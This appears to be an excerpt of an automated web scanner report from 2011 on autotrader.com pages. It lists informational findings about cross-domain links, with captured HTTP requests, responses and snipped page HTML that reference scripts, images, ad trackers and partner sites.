http://www.autotraderstatic.com/img/fsbo/tim.jpg?v=3.17.167500
http://www.autotraderstatic.com/img/index-b/affiliates-module-hr.gif?v=3.17.167500
http://www.autotraderstatic.com/img/index-b/atc-logo.gif?v=3.17.167500
http://www.autotraderstatic.com/img/index-b/fyc-corner-bottom.png?v=3.17.167500
http://www.autotraderstatic.com/img/index-b/fyc-corner-top.png?v=3.17.167500
http://www.autotraderstatic.com/img/redirects/allapprovedcars-logo3.jpg?v=3.17.167500
http://www.autotraderstatic.com/img/redirects/autotrader-logo3.jpg?v=3.17.167500
http://www.autotraderstatic.com/img/redirects/carmony-logo3.jpg?v=3.17.167500
http://www.autotraderstatic.com/img/shared/ajax-loader.gif?v=3.17.167500
http://www.autotraderstatic.com/img/standardicons/offsite_icon_off-state_03.gif?v=3.17.167500
http://www.autotraderstatic.com/inc/css/homepage/css-reset.css?v=3.17.167500
http://www.autotraderstatic.com/inc/css/homepage/index-b1.css?v=3.17.167500
http://www.autotraderstatic.com/inc/css/homepage/master.css?v=3.17.167500
http://www.autotraderstatic.com/inc/css/index-b-header.css?v=3.17.167500
http://www.autotraderstatic.com/inc/css/redirects.css?v=3.17.167500
http://www.autotraderstatic.com/inc/global.js?v=3.17.167500
http://www.autotraderstatic.com/inc/js/ATC/ATC.js?v=3.17.167500
http://www.autotraderstatic.com/inc/js/ATC/utils/biUtils.js?v=3.17.167500
http://www.autotraderstatic.com/inc/js/Tabber.js?v=3.17.167500
http://www.autotraderstatic.com/inc/js/UltraPop.js?v=3.17.167500
http://www.autotraderstatic.com/inc/js/atcbi.js?v=3.17.167500
http://www.autotraderstatic.com/inc/js/base64.js?v=3.17.167500
http://www.autotraderstatic.com/inc/js/fixBKms.js?v=3.17.167500
http://www.autotraderstatic.com/inc/js/homepage/anim-tabs-player.js?v=3.17.167500
http://www.autotraderstatic.com/inc/js/homepage/anim-tabs.js?v=3.17.167500
http://www.autotraderstatic.com/inc/js/homepage/homepage-b-script.js?v=3.17.167500
http://www.autotraderstatic.com/inc/js/homepage/homepage-review-selector.js?v=3.17.167500
http://www.autotraderstatic.com/inc/js/homepage/myAtcUtil.js?v=3.17.167500
http://www.autotraderstatic.com/inc/js/homepage/newCarSelectionform.js?v=3.17.167500
http://www.autotraderstatic.com/inc/js/iepng.js?v=3.17.167500
http://www.autotraderstatic.com/inc/js/myatc/notifications.js?v=3.17.167500
http://www.autotraderstatic.com/inc/js/prototype/prototype.js?v=3.17.167500
http://www.autotraderstatic.com/js/jquery-1.3.2.min.js?v=3.17.167500
http://www.autotraderstatic.com/js/jqueryui/css/atc-theme/jquery-ui-1.7.2.custom.css?v=3.17.167500
http://www.autotraderstatic.com/js/jqueryui/css/atc-theme/jquery-ui-atc-custom.css?v=3.17.167500
http://www.autotraderstatic.com/js/jqueryui/js/jquery-ui-1.7.2.custom.min.js?v=3.17.167500
http://www.autotraderstatic.com/js/plugins/bgiframe_2.1.1/jquery.bgiframe.min.js?v=3.17.167500
http://www.autotraderstatic.com/no_cache/bi_audit?Log=0
http://www.autotraderstatic.com/onlineopinion/onlineopinion3t.js?v=3.17.167500
http://www.carmony.co.uk/
http://www.dealsonwheels.com/
http://www.lendingtree.com/alliance/from.asp?whereto=auto&bp=autotrader4&source=1569050&esourceid=1569050
http://www.nadaguides.com/partner.aspx?adid=167244

Request

GET /?LNX=PTRDRFYCHP HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIRF_Audit=true; JSESSIONID=9FDC9D8306C6C65BA049C7655627ABAE; ATC_USER_ZIP=; ATC_PID=-1761786222|959219900373039673; v1st=BF3F7217996B123A; ATC_ID=173.193.214.243.1295884767492259; BIGipServerwww=1619582986.61475.0000; mbox=check#true#1295922044|session#1295921983404-727382#1295923844|PC#1295921983404-727382.17#1297131585;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:14:07 GMT
Server: Apache
Set-Cookie: JSESSIONID=9FDC9D8306C6C65BA049C7655627ABAE; Path=/
Set-Cookie: ATC_USER_ZIP=; Domain=.autotrader.com; Expires=Wed, 01-Feb-2012 14:14:07 GMT; Path=/
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: BIGipServerAT-Production_hhtp=3794953738.61475.0000; path=/
Content-Length: 60558

<!DOCTYPE html P
...[SNIP]...
<link rel="alternate" media="handheld" xhref="http://m.autotrader.com/" />

<link rel="stylesheet" href="http://www.autotraderstatic.com/css/atc-ui.css?v=3.17.167500" type="text/css" />
<link rel="stylesheet" href="http://www.autotraderstatic.com/inc/css/index-b-header.css?v=3.17.167500" type="text/css" />
<link rel="stylesheet" href="http://www.autotraderstatic.com/js/jqueryui/css/atc-theme/jquery-ui-1.7.2.custom.css?v=3.17.167500" type="text/css"/>
<link rel="stylesheet" href="http://www.autotraderstatic.com/js/jqueryui/css/atc-theme/jquery-ui-atc-custom.css?v=3.17.167500" type="text/css"/>
<link rel="stylesheet" href="http://www.autotraderstatic.com/inc/css/homepage/css-reset.css?v=3.17.167500" type="text/css" />
<link rel="stylesheet" href="http://www.autotraderstatic.com/inc/css/homepage/master.css?v=3.17.167500" type="text/css" />
<link rel="stylesheet" href="http://www.autotraderstatic.com/inc/css/homepage/index-b1.css?v=3.17.167500" type="text/css" />

<style type="text/css">
...[SNIP]...
</style>

<script src="http://www.autotraderstatic.com/inc/js/prototype/prototype.js?v=3.17.167500" type="text/javascript"></script>

<script type="text/javascript" src="http://www.autotraderstatic.com/js/jquery-1.3.2.min.js?v=3.17.167500"></script>
<script type="text/javascript" src="http://www.autotraderstatic.com/js/jqueryui/js/jquery-ui-1.7.2.custom.min.js?v=3.17.167500"></script>
...[SNIP]...
</script>

<script src="http://www.autotraderstatic.com/inc/global.js?v=3.17.167500" type="text/javascript"></script>

<script src="http://www.autotraderstatic.com/inc/js/Tabber.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/homepage/myAtcUtil.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/UltraPop.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/iepng.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/fixBKms.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/dwr/engine.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/dwr/interface/ModelSearchUtil.js?v=3.17.167500" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://www.autotraderstatic.com/dwr/interface/MarketManager.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/dwr/util.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/ATC/ATC.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/ATC/utils/biUtils.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/homepage/homepage-review-selector.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/homepage/newCarSelectionform.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/homepage/homepage-b-script.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/base64.js?v=3.17.167500" type="text/javascript"></script>

<script src="http://www.autotraderstatic.com/inc/js/atcbi.js?v=3.17.167500" type="text/javascript"></script>

<script src="http://www.autotraderstatic.com/onlineopinion/onlineopinion3t.js?v=3.17.167500" type="text/javascript"></script>

<script src="http://www.autotraderstatic.com/cms/test_and_target/mbox.js?v=3.17.167500" type="text/javascript"></script>
...[SNIP]...
<a id="atc-logo" birf:cmp="atc_lgo" href="/"><img birf:log="component" birf:ref="../" src="http://www.autotraderstatic.com/img/index-b/atc-logo.gif?v=3.17.167500" alt="Buy New or Used Cars at AutoTrader.com"/></a>

<script type="text/javascript" src="http://www.autotraderstatic.com/js/plugins/bgiframe_2.1.1/jquery.bgiframe.min.js?v=3.17.167500"></script>
<script type='text/javascript' src='http://www.autotraderstatic.com/dwr/engine.js?v=3.17.167500'></script>
<script type='text/javascript' src='http://www.autotraderstatic.com/dwr/interface/UserMsgController.js?v=3.17.167500'></script>
<script type="text/javascript" src="http://www.autotraderstatic.com/inc/js/myatc/notifications.js?v=3.17.167500"></script>
...[SNIP]...
<li><a birf:log="component" birf:cmp="loan_l" href="http://www.lendingtree.com/alliance/from.asp?whereto=auto&bp=autotrader4&source=1569050&esourceid=1569050" onClick="return BILogUtil.Redirector(this.href, ['mis=GNNDBDMGLT1136'], false).send();" title="Car loans">Loans</a>
...[SNIP]...
<noscript><img src="http://www.autotraderstatic.com/no_cache/bi_audit?Log=0"/></noscript>
...[SNIP]...
</form>
<img id="fyc-corner-top" src="http://www.autotraderstatic.com/img/index-b/fyc-corner-top.png?v=3.17.167500" class="iePNG"/>
<img id="fyc-corner-bottom" src="http://www.autotraderstatic.com/img/index-b/fyc-corner-bottom.png?v=3.17.167500" class="iePNG"/>

<ul id="fyc-nav" class="clearfix"></ul>

<script src="http://www.autotraderstatic.com/inc/js/homepage/anim-tabs.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/homepage/anim-tabs-player.js?v=3.17.167500" type="text/javascript"></script>
...[SNIP]...
px%3Futm_source=autotrader&utm_medium=banner&utm_campaign=null+Hero1" onclick="return BILogUtil.Redirector(this.href, ['mis=HMNDBDLNHB1368', 'rdpage=71015_1_TIMOFREASIER', 'address='], false).send();"><img class="feature" src="http://www.autotraderstatic.com/cms/img/homepage/promo/images_71015.jpg?v=3.17.167500" alt="Trade In Marketplace" title="Trade In Marketplace" width="440" height="248"/></a>
...[SNIP]...
mage" href="/fyc/index.jsp%3Flang=en&search_type=new&showZipErrors=y" onclick="return BILogUtil.Redirector(this.href, ['mis=HMNDBDLNHB1368', 'rdpage=77599_2_FYCNEWFNDNOW', 'address='], false).send();"><img class="feature" src="http://www.autotraderstatic.com/cms/img/homepage/promo/images_77599.jpg?v=3.17.167500" alt="Find New Cars" title="Find New Cars" width="440" height="248"/></a>
...[SNIP]...
<a class="promo image" href="/research/new-cars/index.jsp" onclick="return BILogUtil.Redirector(this.href, ['mis=HMNDBDLNHB1368', 'rdpage=76769_3_RESNEWFEELNG', 'address='], false).send();"><img class="feature" src="http://www.autotraderstatic.com/cms/img/homepage/promo/images_76769.jpg?v=3.17.167500" alt="New Car Research" title="New Car Research" width="440" height="248"/></a>
...[SNIP]...
<a class="promo image" href="/top-tech.jsp" onclick="return BILogUtil.Redirector(this.href, ['mis=HMNDBDLNHB1368', 'rdpage=76470_4_RESTPCTOPTEC', 'address='], false).send();"><img class="feature" src="http://www.autotraderstatic.com/cms/img/homepage/promo/images_76470.jpg?v=3.17.167500" alt="Top Car Tech" title="Top Car Tech" width="440" height="248"/></a>
...[SNIP]...
<a class="promo image" href="/about/mobile-faq.jsp" onclick="return BILogUtil.Redirector(this.href, ['mis=HMNDBDLNHB1368', 'rdpage=76859_5_MBLFAQPC2PKT', 'address='], false).send();"><img class="feature" src="http://www.autotraderstatic.com/cms/img/homepage/promo/images_76859.jpg?v=3.17.167500" alt="Mobile Phone" title="Mobile Phone" width="440" height="248"/></a>
...[SNIP]...
<a href="https://tradein.autotrader.com/ATPages/TradeInMarketPlace.aspx%3Futm_source=autotrader&utm_medium=banner&utm_campaign=null+Hero1"><img src="http://www.autotraderstatic.com/cms/img/homepage/thumbnail/images_71012.png?v=3.17.167500" width="69" height="43" alt="Trade In Marketplace" title="Trade In Marketplace" class="thumb iePNG"/></a>
...[SNIP]...
<a href="/fyc/index.jsp%3Flang=en&search_type=new&showZipErrors=y"><img src="http://www.autotraderstatic.com/cms/img/homepage/thumbnail/images_77600.png?v=3.17.167500" width="69" height="43" alt="Find New Cars" title="Find New Cars" class="thumb iePNG"/></a>
...[SNIP]...
<a href="/research/new-cars/index.jsp"><img src="http://www.autotraderstatic.com/cms/img/homepage/thumbnail/images_76772.png?v=3.17.167500" width="69" height="43" alt="New Car Research" title="New Car Research" class="thumb iePNG"/></a>
...[SNIP]...
<a href="/top-tech.jsp"><img src="http://www.autotraderstatic.com/cms/img/homepage/thumbnail/images_76472.png?v=3.17.167500" width="69" height="43" alt="Top Car Tech" title="Top Car Tech" class="thumb iePNG"/></a>
...[SNIP]...
<a href="/about/mobile-faq.jsp"><img src="http://www.autotraderstatic.com/cms/img/homepage/thumbnail/images_76860.png?v=3.17.167500" width="69" height="43" alt="Mobile Phone" title="Mobile Phone" class="thumb iePNG"/></a>
...[SNIP]...
<a href="/about/mobile-faq.jsp?rdpage=HPT2PROMO" >
<img id="tab-ad-one-promo-img" src="http://www.autotraderstatic.com/cms/img/homepage/promo/images_64859.jpg?v=3.17.167500" width="300" height="100" alt="AutoTrader.com Mobile Website FAQ" />
</a>
...[SNIP]...
<li><a class="external-link" href="http://www.nadaguides.com/partner.aspx?adid=167244" onclick="return BILogUtil.Redirector(this.href, ['mis=HMNDBDMGNA1227', 'rdpage=HPTABRCH'], true).send();" title="Car valuation">What's my car worth?</a>
...[SNIP]...
<a href="https://sell.autotrader.com/syc/syc_center.jsf?rdpage=HPT2PROMO" >
<img src="http://www.autotraderstatic.com/cms/img/homepage/promo/images_64860.jpg?v=3.17.167500" width="300" height="100" alt="Sell Your Car" />
</a>
...[SNIP]...
<a href="https://sell.autotrader.com/syc/syc_center.jsf?rdpage=HPT2PROMO" >
<img src="http://www.autotraderstatic.com/cms/img/homepage/promo/images_64560.jpg?v=3.17.167500" width="300" height="100" alt="Sell Your Car" />
</a>
...[SNIP]...
<a href="https://tradein.autotrader.com/ATPages/TradeInMarketPlace.aspx">
<img src="http://www.autotraderstatic.com/img/fsbo/tim.jpg?v=3.17.167500" alt="Trade-In Marketplace"/>
</a>
...[SNIP]...
<div class="module-seperator">
<img src="http://www.autotraderstatic.com/img/fsbo/fsbo_module-sep.png?v=3.17.167500" alt="" />
</div>
...[SNIP]...
<a href="https://sell.autotrader.com/syc/syc_center.jsf">
<img src="http://www.autotraderstatic.com/img/fsbo/forsale.jpg?v=3.17.167500" alt="SYC Center"/>
</a>
...[SNIP]...
<li id="autotrader-classics">

<a class="external-link" href="http://www.autotraderclassics.com/?utm_source=atc&utm_medium=links&utm_content=atchp&utm_campaign=partnership+links" onclick="return BILogUtil.Redirector(this.href, ['mis=HMNDBDLNTO1107'], true).send();">
<img src="http://www.autotraderstatic.com/cms/img/homepage/autoTraderClassics_Logo.gif?v=3.17.167500" alt="" id="atcClassic-logo"/>
<span>
...[SNIP]...
<div id="autotrader-classics-hr">
<img src="http://www.autotraderstatic.com/img/index-b/affiliates-module-hr.gif?v=3.17.167500"/>
</div>
...[SNIP]...
<li id="auto-mercado">

<a class="external-link" href="http://www.autotraderlatino.com?LNX=ATCAMHMPGBUSC" onclick="return BILogUtil.Redirector(this.href, ['mis=HMNDBDLNFC737'], true).send();">
<img id="atcLatino-logo" src="http://www.autotraderstatic.com/cms/img/homepage/autoMercado_logo.gif?v=3.17.167500" alt=""/>
<span>
...[SNIP]...
<div id="autotrader-latino-hr">
<img src="http://www.autotraderstatic.com/img/index-b/affiliates-module-hr.gif?v=3.17.167500"/>
</div>
...[SNIP]...
</script>

<a href="http://www.dealsonwheels.com/" onmouseover="dow_mover()" onmouseout="dow_mout()" onclick="return BILogUtil.Redirector(this.href, ['mis=HMNDBDLNDW1108'], true).send();">
<img style="float: left;" id="atcDealsOnWheels-logo" src="http://www.autotraderstatic.com/cms/img/homepage/Deals_on_Wheels.gif?v=3.17.167500" alt=""/>
<div style="float: left;cursor:pointer;" id="dow_text">
...[SNIP]...
</a>
<a href="http://www.dealsonwheels.com/" onmouseover="dow_mover()" onmouseout="dow_mout()" onclick="return BILogUtil.Redirector(this.href, ['mis=HMNDBDLNDW1108'], true).send();">
<img style="float: left;padding-left:6px;padding-top:4px;" src="http://www.autotraderstatic.com/img/standardicons/offsite_icon_off-state_03.gif?v=3.17.167500" id="dow_offsite"/>
</a>
...[SNIP]...
</div>

<link rel="stylesheet" href="http://www.autotraderstatic.com/inc/css/redirects.css?v=3.17.167500" />

<div id="intlRedirectModal">
...[SNIP]...
<div class="redirectModalContent">
<img class="logo" src="http://www.autotraderstatic.com/img/ATCweb_white_223x29.jpg?v=3.17.167500" width="223" height="29" alt="AutoTrader.com" />
<h2 class="title">
...[SNIP]...
</p>
<img class="loader" src="http://www.autotraderstatic.com/img/shared/ajax-loader.gif?v=3.17.167500" />
<p class="callToAction">
...[SNIP]...
<li>
<a href="http://www.carmony.co.uk">
<img src="http://www.autotraderstatic.com/img/redirects/carmony-logo3.jpg?v=3.17.167500"/>Take me to Carmony.co.uk, AutoTrader.com®'s sister site, to look for cars in the U.K.
</a>
...[SNIP]...
<a href="#">
<img src="http://www.autotraderstatic.com/img/redirects/autotrader-logo3.jpg?v=3.17.167500"/>I want to stay and look for cars on AutoTrader.com in the U.S.A.
</a>
...[SNIP]...
<div class="redirectModalContent">
<img class="logo" src="http://www.autotraderstatic.com/img/ATCweb_white_223x29.jpg?v=3.17.167500" width="223" height="29" alt="AutoTrader.com" />
<h2 class="title">
...[SNIP]...
</p>
<img class="loader" src="http://www.autotraderstatic.com/img/shared/ajax-loader.gif?v=3.17.167500" />
<p class="callToAction">
...[SNIP]...
<li>
<a href="http://www.allapprovedcars.be">
<img src="http://www.autotraderstatic.com/img/redirects/allapprovedcars-logo3.jpg?v=3.17.167500"/>Take me to AllApprovedCars.be, AutoTrader.com®'s sister site, to look for cars in Belgium
</a>
...[SNIP]...
<a href="#">
<img src="http://www.autotraderstatic.com/img/redirects/autotrader-logo3.jpg?v=3.17.167500"/>I want to stay and look for cars on AutoTrader.com in the U.S.A.
</a>
...[SNIP]...
<div style="display:none;"><img src="http://beacon.afy11.net/ad?&mode=4&ac=0&av=0&rand=1295964847034&kd=autotraderhomepage" width="0" height="0" alt="Adify"/></div>

<div style="display:none;"><img src="http://pc1.yumenetworks.com/dynamic_gn_atzsqnlc_1295964847034?yumehomepage" width="0" height="0" alt="YuMe"/></div>
...[SNIP]...
<li><a href="http://autotrader.mediaroom.com/" onclick="return BILogUtil.Redirector(this.href, ['mis=ALLBFTLNPR1248'], false).send();" >Press Room</a>
...[SNIP]...
<NOSCRIPT>
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=1829700;type=homep704;cat=autot851;ord=1?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...
<NOSCRIPT>
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=3003809;type=homep126;cat=autot581;ord=1?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...

20.562. http://www.autotrader.com/hornav/trader/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autotrader.com
Path:	/hornav/trader/index.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.autotrader.com/hornav/trader/index.jsp?LNX=PTRDRSYCTAB

The response contains the following links to other domains:

http://ad.doubleclick.net/activity;src=991248;type=selly314;cat=fsbol647;ord=1?
http://autotrader.mediaroom.com/
http://autotrader.mota.com/lp/atvip8?c=ATVIP9&zip=
http://cetrk.com/pages/scripts/0006/4068.js
http://www.autotraderstatic.com/cms/css/new_model.css?v=3.17.167500
http://www.autotraderstatic.com/cms/img/images_61698.jpg?v=3.17.167500
http://www.autotraderstatic.com/cms/img/images_61699.jpg?v=3.17.167500
http://www.autotraderstatic.com/cms/img/images_61701.png?v=3.17.167500
http://www.autotraderstatic.com/cms/img/images_61703.jpg?v=3.17.167500
http://www.autotraderstatic.com/cms/img/images_69093.png?v=3.17.167500
http://www.autotraderstatic.com/cms/img/images_69094.png?v=3.17.167500
http://www.autotraderstatic.com/cms/img/images_71597.jpg?v=3.17.167500
http://www.autotraderstatic.com/cms/resources/fsbo/fsbo_landing.css?v=3.17.167500
http://www.autotraderstatic.com/cms/test_and_target/mbox.js?v=3.17.167500
http://www.autotraderstatic.com/css/atc-ui.css?v=3.17.167500
http://www.autotraderstatic.com/dwr/engine.js?v=3.17.167500
http://www.autotraderstatic.com/dwr/interface/UserMsgController.js?v=3.17.167500
http://www.autotraderstatic.com/hornav/js/fsbo-survey.js?v=3.17.167500
http://www.autotraderstatic.com/hornav/js/fsbo_landing_page.js?v=3.17.167500
http://www.autotraderstatic.com/hornav/js/sellyourcar-english_mtagconfig.js?v=3.17.167500
http://www.autotraderstatic.com/img/fsbo/btn_learn_more.jpg?v=3.17.167500
http://www.autotraderstatic.com/img/fsbo/price-your-car.jpg?v=3.17.167500
http://www.autotraderstatic.com/img/fsbo/secure.gif?v=3.17.167500
http://www.autotraderstatic.com/img/index-b/atc-logo.gif?v=3.17.167500
http://www.autotraderstatic.com/img/standardicons/offsite_icon_off-state_03.gif?v=3.17.167500
http://www.autotraderstatic.com/inc/css/fsbo/new-gen-syc.css?v=3.17.167500
http://www.autotraderstatic.com/inc/css/fsbo/newfsbo2.css?v=3.17.167500
http://www.autotraderstatic.com/inc/css/homepage/index-b-SYC.css?v=3.17.167500
http://www.autotraderstatic.com/inc/css/index-b-header.css?v=3.17.167500
http://www.autotraderstatic.com/inc/global.js?v=3.17.167500
http://www.autotraderstatic.com/inc/js/atcbi.js?v=3.17.167500
http://www.autotraderstatic.com/inc/js/myatc/notifications.js?v=3.17.167500
http://www.autotraderstatic.com/inc/js/prototype/prototype.js?v=3.17.167500
http://www.autotraderstatic.com/js/jquery-1.3.2.min.js?v=3.17.167500
http://www.autotraderstatic.com/js/jqueryui/css/atc-theme/jquery-ui-1.7.2.custom.css?v=3.17.167500
http://www.autotraderstatic.com/js/jqueryui/css/atc-theme/jquery-ui-atc-custom.css?v=3.17.167500
http://www.autotraderstatic.com/js/jqueryui/js/jquery-ui-1.7.2.custom.min.js?v=3.17.167500
http://www.autotraderstatic.com/js/plugins/bgiframe_2.1.1/jquery.bgiframe.min.js?v=3.17.167500
http://www.autotraderstatic.com/no_cache/bi_audit?Log=0
http://www.autotraderstatic.com/onlineopinion/onlineopinion3t.js?v=3.17.167500
http://www.lendingtree.com/alliance/from.asp?whereto=auto&bp=autotrader4&source=1569050&esourceid=1569050
https://fls.doubleclick.net/activityi;src=1829700;type=pscou187;cat=place918;ord=1?

Request

GET /hornav/trader/index.jsp?LNX=PTRDRSYCTAB HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v1st=BF3F7217996B123A; ATC_ID=173.193.214.243.1295884767492259; BIGipServerwww=1317593098.61475.0000;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:56:16 GMT
Server: Apache
Set-Cookie: JSESSIONID=C02306C0B00185723586B177780BC2FB; Path=/
Set-Cookie: ATC_USER_ZIP=; Domain=.autotrader.com; Expires=Tue, 31-Jan-2012 23:56:16 GMT; Path=/
Set-Cookie: ac_afflt=; Path=/
Content-Language: en
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: BIGipServerAT-Production_hhtp=2134009354.61475.0000; path=/
Content-Length: 44406

<birf:pageLoad pg="syc_lp"></birf:pageLoad>
<script type="text/javascript">
BIRFPageData = {
pg_inst:
...[SNIP]...
<noscript><img src="http://www.autotraderstatic.com/no_cache/bi_audit?Log=0"/></noscript>
...[SNIP]...
<link rel="stylesheet" href="/inc/css/master.css" type="text/css" />

<link rel="stylesheet" href="http://www.autotraderstatic.com/css/atc-ui.css?v=3.17.167500" type="text/css" />
<link rel="stylesheet" href="http://www.autotraderstatic.com/inc/css/index-b-header.css?v=3.17.167500" type="text/css" />
<link rel="stylesheet" href="http://www.autotraderstatic.com/js/jqueryui/css/atc-theme/jquery-ui-1.7.2.custom.css?v=3.17.167500" type="text/css"/>
<link rel="stylesheet" href="http://www.autotraderstatic.com/js/jqueryui/css/atc-theme/jquery-ui-atc-custom.css?v=3.17.167500" type="text/css"/>
<link rel="stylesheet" href="http://www.autotraderstatic.com/inc/css/fsbo/newfsbo2.css?v=3.17.167500" type="text/css" />
<link rel="stylesheet" href="http://www.autotraderstatic.com/cms/css/new_model.css?v=3.17.167500" type="text/css" />
<link rel="stylesheet" href="http://www.autotraderstatic.com/cms/resources/fsbo/fsbo_landing.css?v=3.17.167500" type="text/css" />

<style type="text/css">
...[SNIP]...
</style>

<link rel="stylesheet" href="http://www.autotraderstatic.com/inc/css/homepage/index-b-SYC.css?v=3.17.167500" type="text/css" />

<link rel="stylesheet" href="http://www.autotraderstatic.com/inc/css/fsbo/new-gen-syc.css?v=3.17.167500" type="text/css" />

<script src="http://www.autotraderstatic.com/inc/js/prototype/prototype.js?v=3.17.167500" type="text/javascript"></script>

<script type="text/javascript" src="http://www.autotraderstatic.com/js/jquery-1.3.2.min.js?v=3.17.167500"></script>
<script type="text/javascript" src="http://www.autotraderstatic.com/js/jqueryui/js/jquery-ui-1.7.2.custom.min.js?v=3.17.167500"></script>
...[SNIP]...
</script>

<script src="http://www.autotraderstatic.com/inc/global.js?v=3.17.167500" type="text/javascript"></script>

<script src="http://www.autotraderstatic.com/hornav/js/fsbo_landing_page.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/hornav/js/fsbo-survey.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/prototype/prototype.js?v=3.17.167500" type="text/javascript"></script>

<script src="http://www.autotraderstatic.com/inc/js/atcbi.js?v=3.17.167500" type="text/javascript"></script>

<script src="http://www.autotraderstatic.com/onlineopinion/onlineopinion3t.js?v=3.17.167500" type="text/javascript"></script>

<script src="http://www.autotraderstatic.com/cms/test_and_target/mbox.js?v=3.17.167500" type="text/javascript"></script>
...[SNIP]...
<a id="atc-logo" birf:cmp="atc_lgo" href="/"><img birf:log="component" birf:ref="../" src="http://www.autotraderstatic.com/img/index-b/atc-logo.gif?v=3.17.167500" alt="Buy New or Used Cars at AutoTrader.com"/></a>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.autotraderstatic.com/js/plugins/bgiframe_2.1.1/jquery.bgiframe.min.js?v=3.17.167500"></script>
<script type='text/javascript' src='http://www.autotraderstatic.com/dwr/engine.js?v=3.17.167500'></script>
<script type='text/javascript' src='http://www.autotraderstatic.com/dwr/interface/UserMsgController.js?v=3.17.167500'></script>
<script type="text/javascript" src="http://www.autotraderstatic.com/inc/js/myatc/notifications.js?v=3.17.167500"></script>
...[SNIP]...
<li><a birf:log="component" birf:cmp="loan_l" href="http://www.lendingtree.com/alliance/from.asp?whereto=auto&bp=autotrader4&source=1569050&esourceid=1569050" onClick="return BILogUtil.Redirector(this.href, ['mis=GNNDBDMGLT1136'], false).send();" title="Car loans">Loans</a>
...[SNIP]...
</script>

<script src="http://www.autotraderstatic.com/hornav/js/sellyourcar-english_mtagconfig.js?v=3.17.167500" type="text/javascript"></script>
...[SNIP]...
<td style="padding-left:3px;">
<img src="http://www.autotraderstatic.com/cms/img/images_61701.png?v=3.17.167500" onmouseover="this.src='/cms/img/images_61702.png';" onmouseout="this. src='http://www.autotraderstatic.com/cms/img/images_61701.png?v=3.17.167500';" onclick="disableSurvey();$('syc_bridge').submit();" />
<input type="submit" onclick="disableSurvey();" value="" id="submitBtn" class="submitBtn" style="display:none;"/>
...[SNIP]...
<div style="font-size:12px;padding-top:10px;font-weight:bold;">
<img src="http://www.autotraderstatic.com/cms/img/images_61703.jpg?v=3.17.167500" /> 
<a class="quiz-link" href="https://sell.autotrader.com/syc/syc_wizard.jsf" >
...[SNIP]...
<div id="right-promo-1" style=" padding-top: 15px; display: none;"><img alt="" src="http://www.autotraderstatic.com/cms/img/images_69093.png?v=3.17.167500" /></div><div id="right-promo-2" style=" padding-top: 15px; display: none;"><img alt="" src="http://www.autotraderstatic.com/cms/img/images_69094.png?v=3.17.167500" /></div>
...[SNIP]...
<td class="left-twitter">

<a href="http://autotrader.mota.com/lp/atvip8?c=ATVIP9&zip=" onclick="return BIHelper.logEventForAC('syc_landing_VIP_link', this.href, 'BIHelper.openInNewWindow()', 'NA')">
<img src="http://www.autotraderstatic.com/cms/img/images_71597.jpg?v=3.17.167500" alt="" />
</a>
...[SNIP]...
<a href="https://sell.autotrader.com/syc/pricing_tool.jsf">
<img src="http://www.autotraderstatic.com/img/fsbo/price-your-car.jpg?v=3.17.167500" onmouseover="this.src='/img/fsbo/price-your-car_over.jpg';" onmouseout="this. src='http://www.autotraderstatic.com/img/fsbo/price-your-car.jpg?v=3.17.167500';" />
</a>
...[SNIP]...
g_why_atc', this.href, 'BIHelper.openInPopup(600, 817)', 'syc');" href="https://sell.autotrader.com/syc/cms/resources/fsbo/why_atc.jsf">
<img src="http://www.autotraderstatic.com/img/fsbo/btn_learn_more.jpg?v=3.17.167500" onmouseover="this.src='/img/fsbo/btn_learn_more_over.jpg';" onmouseout="this. src='http://www.autotraderstatic.com/img/fsbo/btn_learn_more.jpg?v=3.17.167500';" />
</a>
...[SNIP]...
<div style="text-align:center;width:155px;"><img src="http://www.autotraderstatic.com/cms/img/images_61698.jpg?v=3.17.167500" /></div>
...[SNIP]...
<td class="right">
<img src="http://www.autotraderstatic.com/cms/img/images_61699.jpg?v=3.17.167500" />
</td>
...[SNIP]...
